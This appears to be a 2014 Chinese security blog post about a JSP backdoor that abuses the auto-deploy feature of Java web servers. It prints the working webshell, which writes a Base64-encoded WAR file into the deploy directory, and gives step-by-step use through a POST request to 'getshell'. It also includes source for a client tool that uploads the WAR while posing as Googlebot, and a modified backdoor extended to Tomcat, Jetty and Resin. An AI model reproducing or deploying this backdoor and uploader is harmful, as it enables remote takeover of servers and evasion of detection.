2014-01-07 16:38:20

Java WebServer 自动部署后门

在乌云社区发现有人发了一个Jboss的自动部署war的后门求此后门的利用方法
<%@page
	import="java.io.*, 
    java.util.*, 
    sun.misc.BASE64Decoder"%>
<%
	String PJdpj = "";
	String pIGx = "";
	String RSVw = System.getProperty("jboss.server.home.dir");
	if (request.getParameter("pUBYyDsT") != null) {
		try {
			PJdpj = request.getParameter("pUBYyDsT");
			pIGx = request.getParameter("oAEICWIo");
			byte[] rFPE = new BASE64Decoder().decodeBuffer(PJdpj);
			String MfNJU = RSVw + "/deploy/" + pIGx + ".war";
			FileOutputStream twkH = new FileOutputStream(MfNJU);
			twkH.write(rFPE);
			twkH.close();
		} catch (Exception e) {
		}
	} else {
		try {
			String VBpM = request.getParameter("oAEICWIo");
			String dhkDS = RSVw + "/deploy/" + VBpM + ".war";
			new File(dhkDS).delete();
		} catch (Exception e) {
		}
	}
%>

挺聪明的Server一般都提供了自动部署服务,也就是说只需要把war包放到默认能够自动部署的目录就行了。

POST提交:http://xxx.com/xxx.jsp

参数:

pUBYyDsT=war文件的Basr64编码&oAEICWIo=Test

然后请求http://xxx.com/Test就getshell了。Test是war文件的项目名。

只需简单的改改getProperty的属性值就能够通用到Tomcat等Server.

客户端工具:

Upload_War_后门.jar

iswin.war

源码:

private void jButton1ActionPerformed(java.awt.event.ActionEvent evt) {
    	String war = jTextField3.getText();
    	if(war!=null){
            try {
            	FileInputStream fis = new FileInputStream(new File(war));
            	byte[] b = new byte[1024];
        		int n = 0;
        		ByteArrayOutputStream baos = new ByteArrayOutputStream();
        		while((n=fis.read(b))!=-1){
        			baos.write(b,0,n);
        		}
				String content = new BASE64Encoder().encode(baos.toByteArray());
				fis.close();
				Map<String,String> map = new HashMap<String, String>();
				map.put("oAEICWIo", jTextField2.getText());
				map.put("pUBYyDsT", content);
				Jsoup.connect(jTextField1.getText()).data(map).userAgent("Googlebot/2.1 (+http://www.googlebot.com/bot.html").timeout(30000).post();
				jTextArea1.setText("请求成功...");
			} catch (Exception e) {
				jTextArea1.setText(e.toString());
			}
    	}
    }
    private void jButton2ActionPerformed(java.awt.event.ActionEvent evt) {     
    	int result = 0;  
    	String path = null;
    	JFileChooser fileChooser = new JFileChooser();  
    	FileSystemView fsv = FileSystemView.getFileSystemView();
    	fileChooser.setCurrentDirectory(fsv.getHomeDirectory());  
    	fileChooser.setDialogTitle("请选择war文件.");  
    	fileChooser.setApproveButtonText("确定");  
    	fileChooser.setFileSelectionMode(JFileChooser.FILES_ONLY);  
    	result = fileChooser.showOpenDialog(fileChooser);  
    	if (JFileChooser.APPROVE_OPTION == result) {  
    	    path=fileChooser.getSelectedFile().getPath();
    	}
    	jTextField3.setText(path);
    }

修改后的jsp后门:

<%@page import="java.io.*,java.util.*,sun.misc.BASE64Decoder"%>
<%!
	String getServer(HttpServletRequest request,String name){
		if(name.indexOf("jboss")!=-1){
			return System.getProperty("jboss.server.home.dir")+"/deploy/";
		}else if(name.indexOf("jetty")!=-1){
			return System.getProperty("jetty.home")+"/webapps/";
		}else if(name.indexOf("resin")!=-1){
			return System.getProperty("resin.home")+"/webapps/";
		}
		return System.getProperty("catalina.home")+"/webapps/";
	}
%>
<%
	String PJdpj = request.getParameter("pUBYyDsT");
	if (PJdpj!= null) {
		try {
			String RSVw = getServer(request, application.getServerInfo().toLowerCase()).replaceAll("\\\\", "/")+request.getParameter("oAEICWIo")+".war";
			FileOutputStream twkH = new FileOutputStream(RSVw);
			twkH.write(new BASE64Decoder().decodeBuffer(PJdpj));
			twkH.close();
			String dhkDS = RSVw+ ".war";
			new File(dhkDS).delete();
		} catch (Exception e) {
		}
	}
%>
发表回复